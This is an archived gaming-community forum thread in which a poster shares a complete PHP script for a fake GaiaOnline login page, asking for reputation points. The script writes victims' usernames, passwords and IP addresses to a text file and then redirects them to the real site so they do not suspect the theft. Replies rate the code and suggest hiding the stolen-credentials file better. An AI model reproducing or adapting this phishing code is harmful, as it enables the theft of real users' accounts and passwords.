A preserved archive of the Logical Gamers community forums, 2009-2025. The original threads and posts, served read-only. Registration, posting and private messages are gone for good.

[PHP] Decent GaiaOnline FLP Login.php

3.6k views · started by iyan ·
#1
[PHP] Decent GaiaOnline FLP Login.php
<?php
// Gaia Online Log In PHP Script.

// Variables.
$Username = $_POST['username'];
$Password = $_POST['password'];
$IP = $_SERVER['REMOTE_ADDR'];

// Place Gaian's data in text file.
file_put_contents('Info.txt', "Username: $Username | Password: $Password | I.P. Address: $IP \n", FILE_APPEND);

// Redirect them to Gaia. (With proper login_success Unix timestamp)
header('Location: http://www.gaiaonline.com/?login_success=' . time());

// Made by: iyan @ lg.
?>


Please rep +
#2
Yeah, this is descent, but not "top of the line".
#3
You did a lot of useless things here. It's about as useful as the others you see. Eh.
You see, you have those variables declared, but they aren't variables. They never change.

info.text is also rather pointless. This is something you don't want people to find. It should be named better than that.
#4
I guess people should know that.
#5
ya . .anywhere nice job. but u done a bit mistake.. i not sure whether its urs for mine
#6
Yeah, it's decent and also made by me. I have posted it on 3-4 other sites, before this post was made for 2-3 of them. I can provide links if requested.